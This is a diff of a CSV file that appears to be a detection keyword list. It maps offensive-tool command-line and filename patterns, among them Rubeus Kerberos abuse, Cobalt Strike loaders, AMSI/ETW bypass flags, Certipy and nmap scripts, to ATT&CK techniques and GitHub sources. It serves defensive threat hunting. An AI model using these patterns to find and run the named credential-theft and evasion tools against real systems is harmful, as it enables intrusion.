 "* Dendron.exe*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z"
 "* deploy_cobalt_beacon*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z"
 "* DesertFox.go","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca 
- Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" 
@@ -443,14 +443,14 @@
 "* detect-hooks.c *","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z"
 "* dhcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* diagrun=true service=DNS* dllpath=*.dll* computername=*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" 
-"* diamond * /certificate:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" 
-"* diamond /tgtdeleg *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" 
-"* diamond /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" 
+"* diamond * /certificate:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" 
+"* diamond /tgtdeleg *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" 
+"* diamond /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
 "* dicom-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* dicom-ping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* dict-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* DInvokeResolver.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" 
-"* --dirnames bank financ payable payment reconcil remit voucher vendor eft swift *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" 
+"* --dirnames bank financ payable payment reconcil remit voucher vendor eft swift *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z"
 "* dirty.c*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","0","N/A","N/A","8","767","437","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z"
 "* dirtycow.c *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z"
 "* Dirty-Pipe.*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","0","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" 
@@ -458,20 +458,20 @@ "* --disable-bypass-amsi*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "* --disable-bypass-cmdline*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "* --disable-bypass-etw*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" -"* DisableETW(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"* DisableWLDP(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* DisableETW(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* DisableWLDP(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "* distcc-cve2004-2687.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --dll * --only *AmsiScanBuffer*AmsiScanString*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" -"* --dll * --payload *","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","6","565","76","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" +"* --dll * --payload *","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","6","567","76","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" "* --dll C:\Windows\System32\version.dll*--dll C:\Windows\System32\userenv.dll*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" "* --dll --dllhijack *","offensive_tool_keyword","CSExec","An 
alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* -DllName * -FunctionName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -DllName * -FunctionName *","offensive_tool_keyword","empire","Empire scripts 
functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -dns_stager_prepend *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* -dns_stager_subhost *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* dns-blacklist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-cache-snoop.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"* dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "* dns-check-zone.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-client-subnet-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-fuzz.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -485,36 +485,36 @@ "* dns-recursion.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-service-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-srv-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -dns-tcp -nameserver * -dc-ip*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* -dns-tcp -nameserver * -dc-ip*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "* dns-update.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-zeustracker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-zone-transfer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* docker-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
